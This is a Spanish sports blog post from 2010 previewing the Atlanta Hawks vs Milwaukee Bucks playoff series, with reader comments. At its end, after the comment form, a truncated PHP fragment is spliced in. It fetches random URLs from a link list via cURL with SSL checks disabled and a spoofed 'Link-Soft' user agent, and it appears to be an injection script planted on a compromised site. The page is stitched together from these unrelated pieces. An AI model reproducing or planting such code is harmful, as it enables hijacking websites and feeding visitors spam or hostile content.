Análisis Atlanta Hawks vs Milwaukee Bucks

16 de April de 2010 por TheDeerHunter

Regular: 2-1 para Atlanta con victoria en Milwaukee.

Hawks: P. Favor: 101,7 – P. Contra: 97
Bucks: P. Favor: 97,7 – P. Contra: 96

No hace muchas semanas que la ESPN analizaba la gran temporada regular de los Bucks con un rotundo titular: “FEAR THE DEER”. Hoy desayunamos la previa realizada por este prestigioso medio y ni uno solo de sus analistas pronostica como vencedor de la serie a los otrora temidos ciervos y muy pocos ven llegar la serie siquiera al 6º partido. Podríamos peinar la red o cualquier medio especializado y se respira casi unánimemente que Milwaukee no tiene apenas ninguna opción contra Atlanta. ¿Se equivocó la ESPN con aquel titular entonces? Tampoco es eso.

Buena parte de aquel “Fear the deer” venía inspirado por una defensa digna de tener en cuenta. La mejor de la franquicia en toda la década y con un incremento de efectividad de casi 5 impresionantes puntos. Buena parte de la misma se sustentaba sobre los hombros de Andrew Bogut, sus más de 10 rebotes por partido y sus 2 tapones y medio. Lamentablemente el center australiano no será de la partida y difícilmente Kurt Thomas y Gadzuric podrán sustituir sus prestaciones. Atlanta, un equipo especialmente físico, se frota las manos. Los aros tiemblan.

Los Hawks son superiores en ataque a los Bucks. Sin Bogut, también lo son en defensa. Una lástima, porque esta eliminatoria hubiera resultado preciosa con el nº 6 de Milwaukee en pista.

Claves de la eliminatoria:

– Dominar los rebotes, dominar los tiros: Antes de la postemporada los Bucks eran superiores reboteando y peores lanzando a canasta. En la medida que sean capaces aguantar la compostura bajo tableros tanto sufriendo para cerrar los rebotes como para negar las típicas penetraciones y mates de los Hawks podrán continuar plantándoles cara.

– El fondo del armario: La rotación de los Bucks se ha destapado como muy amplia, y de garantías. Los Hawks, son muy físicos, pero han jugado toda la temporada con básicamente 6 hombres más Zaza y Evans con un minutaje mucho menor. Les vimos sufrir el año pasado, como también lo hemos comprovado en otros equipos muy físicos (Orlando, Boston…). La gasolina es un factor decisivo a estas alturas. Por ahí podría tener ventaja el equipo de Schiles. Lo que den de sí los Ridnour, Delfino, Ilyasova, Mbah a Moute o Stackhouse será vital.

– Duelo al amanecer: Salmons vs Joe Johnson. El primero se ha mostrado como una espada solvente en su nuevo equipo. Podemos decir que en este tiempo lo ha sido tanto como el escolta all-star de los Hawks. Puede ser un bonito duelo de pistoleros… y decisivo para la serie.

– El factor Jennings: ¿Qué rostro veremos del eléctrico rookie? ¿El que nos deslumbró los dos primeros meses de la competición o el que naufragó en febrero? Atlanta va a ser un excelente exámen final para él y Jennings va a tener que saber lavar y guardar la ropa como nunca.

Agenda:

– P1: Sábado 17 a las 23:30h (horario España)
– P2: Martes 20 a la 1h
– P3: Sábado 24 a la 1h
– P4: Lunes 26 – horario por confirmar

Pronóstico: 4-0 Atlanta

Comenta

7 comentarios a esta entrada

  1. Toni dice:
    #1

    Me apetece más ver este partidazo que ver el de los Lakers que me da miedo la cara con la que pueden salir.
    ¿Veis los partidos por el League Pass? o ¿hay alguna página disponible para verlo?

      Citar

  2. tota dice:
    #2

    Buenas a todos, saludos desde argentina.
    Boston parecía a principio de temporada el mejor equipo de la nba, niungún jugador con grandes números, pero varios en dobles dígitos…esto fue así los primeros veinte partidos? Luego de lesiones me parece que el equipo no volvió a engranar bien, pese a mi parecer a los buenos refuerzos, el resto de la temporada se basó en un Rondó magnífico, Pierce o Allen saliendosé en algún que otro partido, el banco poco y nada.
    Me da la impresión como que los Celtics jugaron a media máquina bastantes partidos, si no la edad realmente esta golpeandolos muy duro.

      Citar

  3. jhc dice:
    #3

    Atlanta se lo va a pasar muy bien con el seguramente el k aora tras la lesion de Bogut sea el equipo mas flojito de los play off no doy mas de cinco partidos y si atlanta esta a buen nivel se los ventilan en 4 facil para atlanta y k si los bobcats dan lucha a los magic incluso se pueden colar en la final de conferencia

      Citar

  4. LEmontus dice:
    #4

    Jennings y nada más….

    Kurt Thomas uno menos tanto en ataque como en defensa no puede ser que horford anotara con esa facilidad….

    Emparejamientos:

    Para empezar un DATO QUE NO SE MENCIONA CUANDO JO JO ESTABA CUBIERTO POR MBAH NO ESTOY SEGURO PERO METIÓ A LO SUMO 5 PUNTOS CON MALÍSIMOS PORCENTAJES(DATO QUE DEBERÍA SER MECNCIONADO). El problema de ésto que delfino quedaba con Josh y delfino es buen defensor pero no sabedefender al poste y ahí le hizo un roto J. Smith.

    Los minutos de Stackhouse con biby otro coladero haciendo faltas los 2 contra 1 y dejando solo a un inspirado biby.

      Citar

  5. LEmontus dice:
    #5

    Por cierto sigo apostando por bucks no podía ser de otra forma…xD

      Citar

  6. kantonyo dice:
    #6

    LeMontus, me he visto el partido de Hawks-Bucks, y creo que ahora mismo Atlanta está muy por encima. Los vi muy sobrados sobre todo en el primer cuarto. En la pintura hay una diferencia abismal sobre todo por la baja de Bogut. Y si no fue porque Atlanta se dejó llevar depués del primer tiempo, hubiera sido un palizón.

    Que crees que debe hacer Bucks para intentar sorprender a Hawks?? Crees que la única solución es dejar que Brandon se juegue 25-30 tiros y confiar en que tenga suerte??

      Citar

  7. TheDeerHunter dice:
    #7

    Teniendo todavía sanos a Delfino, Ridnour y Mbah… no entiendo porqué deberían preocuparse los Bucks XD

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>